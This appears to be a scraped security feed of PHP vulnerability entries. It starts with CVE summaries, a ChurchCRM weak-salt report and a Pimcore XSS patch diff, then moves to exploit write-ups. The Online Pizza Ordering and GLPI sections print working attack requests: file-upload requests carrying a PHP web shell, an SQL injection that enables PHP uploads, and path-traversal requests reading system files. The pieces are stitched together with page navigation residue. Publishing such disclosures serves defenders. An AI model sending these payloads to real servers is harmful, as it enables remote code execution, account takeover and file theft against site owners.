A vulnerability, which was classified as critical, was found in SourceCodester Online Computer and Laptop Store 1.0. This affects an unknown part of the file php-ocls\admin\system_info\index.php. The manipulation of the argument img leads to unrestricted upload. It is possible to initiate the attack remotely. The identifier VDB-224841 was assigned to this vulnerability.

CVE-2023-1826

The hashing algorithm of ChurchCRM v4.5.3 utilizes a non-random salt value which allows attackers to use precomputed hash tables or dictionary attacks to crack the hashed passwords.

**On what page in the application did you find this issue?**

return hash('sha256', $password . $this\->getPersonId());

**On what type of server is this running? Dedicated / Shared hosting? Linux / Windows?**

Windows/xampp

**What browser (and version) are you running?**

Firefox

**What version of PHP is the server running?**

7.4.27

**What version of SQL Server are you running?**

7.4.27

**What version of ChurchCRM are you running?**

4.5.3

**Weak Salt Implementation**

The following report outlines a vulnerability found in the password storage system. The vulnerability arises from the use of a weak salt in the hashing algorithm, which could allow attackers to crack passwords more easily.

Vulnerable Code:

hash('sha256', $password . $this->getPersonId());

Vulnerability Explanation:  
The salt used in the hashing algorithm is generated by the $this->getPersonId() method. However, the method returns an integer value, which is not random or unique for each password. This makes the salt predictable and weak, and could allow attackers to use precomputed hash tables or dictionary attacks to crack the hashed passwords.

Impact:  
The vulnerability could allow an attacker to crack passwords more easily, which could result in unauthorized access to user accounts and sensitive information.

Recommendation:  
To address this vulnerability, it is recommended to use a more secure and unpredictable salt for each password, such as a random value generated for each password. This will make it more difficult for attackers to crack hashed passwords using precomputed hash tables or dictionary attacks.

CVE-2023-26855: Weak Salt Implementation · Issue #6449 · ChurchCRM/CRM

Pimcore Perspective Editor provides an editor for Pimcore that allows users to add/remove/edit custom views and perspectives. This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie or redirect users to other malicious sites. Version 1.5.1 has a patch. As a workaround, one may apply the patch manually.

From abf0ecfeb589bb7385a8847fad45747dc0a56f57 Mon Sep 17 00:00:00 2001 From: ChristianFeldkirchne Date: Tue, 14 Mar 2023 08:20:16 +0100 Subject: \[PATCH 1/4\] optimized perspective and view creation --- src/Resources/public/js/pimcore/perspective/perspective.js | 2 ++ src/Resources/public/js/pimcore/perspective/view.js | 2 ++ src/Services/PerspectiveAccessor.php | 2 +- src/Services/ViewAccessor.php | 2 ++ 4 files changed, 7 insertions(+), 1 deletion(-) diff --git a/src/Resources/public/js/pimcore/perspective/perspective.js b/src/Resources/public/js/pimcore/perspective/perspective.js index 94340c7..0f520ab 100644 --- a/src/Resources/public/js/pimcore/perspective/perspective.js +++ b/src/Resources/public/js/pimcore/perspective/perspective.js @@ -104,6 +104,8 @@ pimcore.bundle.perspectiveeditor.PerspectiveEditor = class { disabled: !pimcore.settings\['perspectives-writeable'\], handler: function(){ Ext.MessageBox.prompt(t('plugin\_pimcore\_perspectiveeditor\_new\_perspective'), t('plugin\_pimcore\_perspectiveeditor\_new\_perspective'), function (button, value) { + value = pimcore.helpers.sanitizeString(value); + if (button === 'ok' && value.length > 0) { //check for configs with same name let match = this.perspectiveTreeStore.findExact("name", value); diff --git a/src/Resources/public/js/pimcore/perspective/view.js b/src/Resources/public/js/pimcore/perspective/view.js index be0a35f..0d0bbad 100644 --- a/src/Resources/public/js/pimcore/perspective/view.js +++ b/src/Resources/public/js/pimcore/perspective/view.js @@ -86,6 +86,8 @@ pimcore.bundle.perspectiveeditor.ViewEditor = class { disabled: !pimcore.settings\['custom-views-writeable'\], handler: function () { Ext.MessageBox.prompt(t('plugin\_pimcore\_perspectiveeditor\_new\_view'), t('plugin\_pimcore\_perspectiveeditor\_new\_view'), function (button, value) { + value = pimcore.helpers.sanitizeString(value); + if (button === 'ok' && value.length > 0) { const record = this.viewTreeStore.getRoot().appendChild({ id: pimcore.bundle.perspectiveeditor.PerspectiveViewHelper.generateUuid(), diff --git a/src/Services/PerspectiveAccessor.php b/src/Services/PerspectiveAccessor.php index 6065d97..1b45424 100644 --- a/src/Services/PerspectiveAccessor.php +++ b/src/Services/PerspectiveAccessor.php @@ -24,7 +24,7 @@ protected function convertTreeStoreToConfiguration($treeStore) $configuration = \[\]; foreach ($treeStore\['children'\] as $child) { - $name = $child\['name'\]; + $name = htmlspecialchars($child\['name'\]); $configuration\[$name\] = \[\]; $configuration\[$name\]\['elementTree'\] = \[\]; foreach ($child\['children'\] as $index => $element) { diff --git a/src/Services/ViewAccessor.php b/src/Services/ViewAccessor.php index dcf9c29..611828f 100644 --- a/src/Services/ViewAccessor.php +++ b/src/Services/ViewAccessor.php @@ -39,6 +39,8 @@ protected function convertTreeStoreToConfiguration($treeStore) if (isset($treeStore\['children'\])) { foreach ($treeStore\['children'\] as $child) { + $child\['config'\]\['name'\] = htmlspecialchars($child\['config'\]\['name'\]); + if (!empty($child\['config'\]\['treeContextMenu'\])) { foreach (array\_keys($child\['config'\]\['treeContextMenu'\]) as $contextMenuEntry) { if (substr($child\['config'\]\['treetype'\], 0, strlen($contextMenuEntry)) != $contextMenuEntry) { From 0947219f8861627919f59697b31129d056ec1af8 Mon Sep 17 00:00:00 2001 From: ChristianFeldkirchne Date: Tue, 14 Mar 2023 08:25:40 +0100 Subject: \[PATCH 2/4\] added condition --- src/Services/ViewAccessor.php | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/src/Services/ViewAccessor.php b/src/Services/ViewAccessor.php index 611828f..edf2ab3 100644 --- a/src/Services/ViewAccessor.php +++ b/src/Services/ViewAccessor.php @@ -39,7 +39,9 @@ protected function convertTreeStoreToConfiguration($treeStore) if (isset($treeStore\['children'\])) { foreach ($treeStore\['children'\] as $child) { - $child\['config'\]\['name'\] = htmlspecialchars($child\['config'\]\['name'\]); + if(array\_key\_exists('name', $child\['config'\])) { + $child\['config'\]\['name'\] = htmlspecialchars($child\['config'\]\['name'\]); + } if (!empty($child\['config'\]\['treeContextMenu'\])) { foreach (array\_keys($child\['config'\]\['treeContextMenu'\]) as $contextMenuEntry) { From 947806d95b0bdbaa152da1e9ebb5159fea0d6f37 Mon Sep 17 00:00:00 2001 From: Corepex Date: Tue, 14 Mar 2023 07:26:15 +0000 Subject: \[PATCH 3/4\] Apply php-cs-fixer changes --- src/Services/ViewAccessor.php | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/Services/ViewAccessor.php b/src/Services/ViewAccessor.php index edf2ab3..83af4bc 100644 --- a/src/Services/ViewAccessor.php +++ b/src/Services/ViewAccessor.php @@ -39,7 +39,7 @@ protected function convertTreeStoreToConfiguration($treeStore) if (isset($treeStore\['children'\])) { foreach ($treeStore\['children'\] as $child) { - if(array\_key\_exists('name', $child\['config'\])) { + if (array\_key\_exists('name', $child\['config'\])) { $child\['config'\]\['name'\] = htmlspecialchars($child\['config'\]\['name'\]); } From 6ae4d56557dbc0178d4cb2f5622ca39f6e62e0e5 Mon Sep 17 00:00:00 2001 From: ChristianFeldkirchne Date: Mon, 20 Mar 2023 11:20:17 +0100 Subject: \[PATCH 4/4\] added sanitizeName function --- src/Resources/public/js/pimcore/perspective/perspective.js | 6 +++++- src/Resources/public/js/pimcore/perspective/view.js | 6 +++++- 2 files changed, 10 insertions(+), 2 deletions(-) diff --git a/src/Resources/public/js/pimcore/perspective/perspective.js b/src/Resources/public/js/pimcore/perspective/perspective.js index 0f520ab..d35f765 100644 --- a/src/Resources/public/js/pimcore/perspective/perspective.js +++ b/src/Resources/public/js/pimcore/perspective/perspective.js @@ -104,7 +104,7 @@ pimcore.bundle.perspectiveeditor.PerspectiveEditor = class { disabled: !pimcore.settings\['perspectives-writeable'\], handler: function(){ Ext.MessageBox.prompt(t('plugin\_pimcore\_perspectiveeditor\_new\_perspective'), t('plugin\_pimcore\_perspectiveeditor\_new\_perspective'), function (button, value) { - value = pimcore.helpers.sanitizeString(value); + value = this.sanitizeName(value); if (button === 'ok' && value.length > 0) { //check for configs with same name @@ -826,4 +826,8 @@ pimcore.bundle.perspectiveeditor.PerspectiveEditor = class { } } } + + sanitizeName (name) { + return name.replace(/\[^a-z0-9\_\\-.+\]/gi,''); + } } diff --git a/src/Resources/public/js/pimcore/perspective/view.js b/src/Resources/public/js/pimcore/perspective/view.js index 0d0bbad..4b13f31 100644 --- a/src/Resources/public/js/pimcore/perspective/view.js +++ b/src/Resources/public/js/pimcore/perspective/view.js @@ -86,7 +86,7 @@ pimcore.bundle.perspectiveeditor.ViewEditor = class { disabled: !pimcore.settings\['custom-views-writeable'\], handler: function () { Ext.MessageBox.prompt(t('plugin\_pimcore\_perspectiveeditor\_new\_view'), t('plugin\_pimcore\_perspectiveeditor\_new\_view'), function (button, value) { - value = pimcore.helpers.sanitizeString(value); + value = this.sanitizeName(value); if (button === 'ok' && value.length > 0) { const record = this.viewTreeStore.getRoot().appendChild({ @@ -569,4 +569,8 @@ pimcore.bundle.perspectiveeditor.ViewEditor = class { } } } + + sanitizeName (name) { + return name.replace(/\[^a-z0-9\_\\-.+\]/gi,''); + } }

CVE-2023-28850

nophp is a PHP web framework. Prior to version 0.0.1, nophp is vulnerable to shell command injection on httpd user. A patch was made available at commit e5409aa2d441789cbb35f6b119bef97ecc3986aa on 2023-03-30. Users should update index.php to 2023-03-30 or later or, as a workaround, add a function such as `env_patchsample230330.php` to env.php.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    
    *   Explore
    *   All features
    *   Documentation
    *   GitHub Skills
    *   Blog
    
*   *   For
    *   Enterprise
    *   Teams
    *   Startups
    *   Education
    
    *   By Solution
    *   CI/CD & Automation
    *   DevOps
    *   DevSecOps
    
    *   Case Studies
    *   Customer Stories
    *   Resources
    
*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
    *   Repositories
    *   Topics
    *   Trending
    *   Collections
    
*   Pricing

CVE-2023-28854: Release Important security fix. · paijp/nophp

Online Pizza Ordering version 1.0 suffers from a remote shell upload vulnerability.

## Title: Online-Pizza-Ordering-1.0 File-Inclusion-RCE  
## Author: nu11secur1ty  
## Date: 03.30.2023  
## Vendor: https://github.com/oretnom23  
## Software: https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html  
## Reference: https://portswigger.net/web-security/file-upload

## Description:  
The malicious user can request an account from the administrator of  
this system.  
Then he can use this vulnerability to destroy or get access to all  
accounts of this system, even more, worst than ever.  
The malicious user can upload a very dangerous file on this server,  
and he can execute it via shell.  
The status is CRITICAL.

STATUS: HIGH Vulnerability

[+]Exploit:  
```mysql  
<?php  
// by nu11secur1ty - 2023  
// Old Name Of The file  
$old_name = "C:/xampp7/htdocs/pwnedhost17/php-opos17" ;

// New Name For The File  
$new_name = "C:/xampp7/htdocs/pwnedhost17/php-opos" ;

// using rename() function to rename the file  
rename( $old_name, $new_name) ;

?>

```  
[+]Injection_REQUEST:  
```POST  
POST /php-opos/admin/ajax.php?action=save_menu HTTP/1.1  
Host: pwnedhost7.com  
Content-Length: 1050  
Accept: */*  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111  
Safari/537.36  
Content-Type: multipart/form-data;  
boundary=----WebKitFormBoundaryt8ceBsdqMkRKDoHX  
Origin: http://pwnedhost7.com  
Referer: http://pwnedhost7.com/php-opos/admin/index.php?page=menu  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: PHPSESSID=sn639s6euv91mfc9rbef4tdr1p  
Connection: close

------WebKitFormBoundaryt8ceBsdqMkRKDoHX  
Content-Disposition: form-data; name="id"

------WebKitFormBoundaryt8ceBsdqMkRKDoHX  
Content-Disposition: form-data; name="name"

------WebKitFormBoundaryt8ceBsdqMkRKDoHX  
Content-Disposition: form-data; name="description"

------WebKitFormBoundaryt8ceBsdqMkRKDoHX  
Content-Disposition: form-data; name="status"

on  
------WebKitFormBoundaryt8ceBsdqMkRKDoHX  
Content-Disposition: form-data; name="category_id"

4  
------WebKitFormBoundaryt8ceBsdqMkRKDoHX  
Content-Disposition: form-data; name="price"

------WebKitFormBoundaryt8ceBsdqMkRKDoHX  
Content-Disposition: form-data; name="img"; filename="namebasterd.php"  
Content-Type: application/octet-stream

<?php  
// by nu11secur1ty - 2023  
// Old Name Of The file  
$old_name = "C:/xampp7/htdocs/pwnedhost17/php-opos17" ;

// New Name For The File  
$new_name = "C:/xampp7/htdocs/pwnedhost17/php-opos" ;

// using rename() function to rename the file  
rename( $old_name, $new_name) ;

?>

------WebKitFormBoundaryt8ceBsdqMkRKDoHX--

```

## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/Online-Pizza-Ordering-1.0)

## Proof and Exploit:  
[href](https://streamable.com/szb9qy)

## Time spend:  
00:45:00

Online Pizza Ordering 1.0 Shell Upload

GLPI Cartography versions prior to 6.0.0 suffers from a remote shell upload vulnerability.

    # Exploit Title: GLPI  Cartography Plugin v6.0.0 - Unauthenticated Remote Code Execution (RCE)# Date of found: 11 Jun 2022# Application: GLPI Cartography < 6.0.0# Author: Nuri Çilengir # Vendor Homepage: https://glpi-project.org/# Software Link: https://github.com/InfotelGLPI/positions# Advisory: https://pentest.blog/advisory-glpi-service-management-software-sql-injection-remote-code-execution-and-local-file-inclusion/# Tested on: Ubuntu 22.04# CVE: CVE-2022-34128# PoCPOST /marketplace/positions/front/upload.php?name=poc.php HTTP/1.1Host: 192.168.56.113User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Length: 39Origin: http://192.168.56.113Connection: close<?php echo system($_GET["cmd"]); ?>

GLPI Cartography Shell Upload

GLPI versions 10.0.0 through 10.0.2 suffer from a remote SQL injection vulnerability that can lead to remote code execution.

    # ADVISORY INFORMATION# Exploit Title: GLPI  v10.0.2 - SQL Injection (Authentication Depends on Configuration)# Date of found: 11 Jun 2022# Application: GLPI >=10.0.0, < 10.0.3# Author: Nuri Çilengir # Vendor Homepage: https://glpi-project.org/# Software Link: https://github.com/glpi-project/glpi# Advisory: https://pentest.blog/advisory-glpi-service-management-software-sql-injection-remote-code-execution-and-local-file-inclusion/# Tested on: Ubuntu 22.04# CVE: CVE-2022-31056# PoCPOST /front/change.form.php HTTP/1.1Host: acme.comUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Content-Type: multipart/form-data; boundary=---------------------------190705055020145329172298897156Content-Length: 4836Cookie: glpi_8ac3914e6055f1dc4d1023c9bbf5ce82_rememberme=%5B2%2C%22wSQx0155YofQn53WMozDGuSI1p2KAzxZ392stmrX%22%5D; glpi_8ac3914e6055f1dc4d1023c9bbf5ce82=f3cciacap6rqs2bcoaio5lmikg-----------------------------190705055020145329172298897156Content-Disposition: form-data; name="id"0-----------------------------190705055020145329172298897156Content-Disposition: form-data; name="_glpi_csrf_token"752d2ff606bf360d809b682f0d9da9c23b290b31453f493f4924e16e77bbba35-----------------------------190705055020145329172298897156Content-Disposition: form-data; name="_actors"{"requester":[],"observer":[],"assign":[{"itemtype":"User","items_id":"2','2',); INSERT INTO `glpi_documenttypes` (`name`, `ext`, `icon`, `mime`, `is_uploadable`) VALUES('PHP', 'php', 'jpg-dist.png', 'application/x-php', 1); ---'","use_notification":"1","alternative_email":""}]}-----------------------------190705055020145329172298897156--If you manipulate the filename uploaded to the system, the file is placed under /files/_tmp/. HTTP GET request required to trigger the issue is as follows.POST /ajax/fileupload.php HTTP/1.1Host: 192.168.56.113User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateX-Glpi-Csrf-Token: bb1c7f6cd4c1865838b234b4f703172a57c19c276d11eb322936d770d75c6dd7X-Requested-With: XMLHttpRequestContent-Type: multipart/form-data; boundary=---------------------------102822935214007887302871396841Content-Length: 559Origin: http://acme.comCookie: glpi_8ac3914e6055f1dc4d1023c9bbf5ce82_rememberme=%5B2%2C%22wSQx0155YofQn53WMozDGuSI1p2KAzxZ392stmrX%22%5D; glpi_8ac3914e6055f1dc4d1023c9bbf5ce82=f3cciacap6rqs2bcoaio5lmikg-----------------------------102822935214007887302871396841Content-Disposition: form-data; name="name"_uploader_filename-----------------------------102822935214007887302871396841Content-Disposition: form-data; name="showfilesize"1-----------------------------102822935214007887302871396841Content-Disposition: form-data; name="_uploader_filename[]"; filename="test.php"Content-Type: application/x-phpOutput:  <?php echo system($_GET['cmd']); ?>-----------------------------102822935214007887302871396841--# POC URLhttp://192.168.56.113/files/_tmp/poc.php?cmd=

GLPI 10.0.2 SQL Injection / Remote Code Execution

GLPI Activity versions prior to 3.1.0 suffer from a local file inclusion vulnerability.

    # Exploit Title: GLPI Activity  v3.1.0 - Authenticated Local File Inclusion on Activity plugin# Date of found: 11 Jun 2022# Application: GLPI Activity < 3.1.0# Author: Nuri Çilengir # Vendor Homepage: https://glpi-project.org/# Software Link: https://github.com/InfotelGLPI/activity# Advisory: https://pentest.blog/advisory-glpi-service-management-software-sql-injection-remote-code-execution-and-local-file-inclusion/# Tested on: Ubuntu 22.04# CVE : CVE-2022-34125# PoCGET /marketplace/activity/front/cra.send.php?&file=../../\\..\\..\\..\\..\\..\\..\\..\\Windows\\System32\\drivers\\etc\\hosts&seefile=1 HTTP/1.1Host: 192.168.56.113User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: close

GLPI Activity Local File Inclusion

GLPI Glpiinventory versions 1.0.1 and below suffer from a local file inclusion vulnerability.

    # ADVISORY INFORMATION# Exploit Title: GLPI Glpiinventory v1.0.1 - Unauthenticated Local File Inclusion  # Date of found: 11 Jun 2022# Application: GLPI Glpiinventory <= 1.0.1# Author: Nuri Çilengir # Vendor Homepage: https://glpi-project.org/# Software Link: https://github.com/glpi-project/glpi-inventory-plugin# Advisory: https://pentest.blog/advisory-glpi-service-management-software-sql-injection-remote-code-execution-and-local-file-inclusion/# Tested on: Ubuntu 22.04# CVE: CVE-2022-31062# PoCPOST /marketplace/glpiinventory/b/deploy/index.php?action=getFilePart&file=../../\\..\\..\\..\\..\\System32\\drivers\\etc\\hosts&version=1 HTTP/1.1Host: 192.168.56.113User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1

GLPI Glpiinventory 1.0.1 Local File Inclusion

GLPI Manageentities versions prior to 4.0.2 suffer from a local file inclusion vulnerability.

    # ADVISORY INFORMATION# Exploit Title: GLPI 4.0.2 - Unauthenticated Local File Inclusion on Manageentities plugin# Date of found: 11 Jun 2022# Application: GLPI Manageentities < 4.0.2# Author: Nuri Çilengir # Vendor Homepage: https://glpi-project.org/# Software Link: https://github.com/InfotelGLPI/manageentities# Advisory: https://pentest.blog/advisory-glpi-service-management-software-sql-injection-remote-code-execution-and-local-file-inclusion/# Tested on: Ubuntu 22.04# CVE : CVE-2022-34127# PoCGET /marketplace/manageentities/inc/cri.class.php?&file=../../\\..\\..\\..\\..\\..\\..\\..\\Windows\\System32\\drivers\\etc\\hosts&seefile=1 HTTP/1.1Host: 192.168.56.113User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1

Tag

#php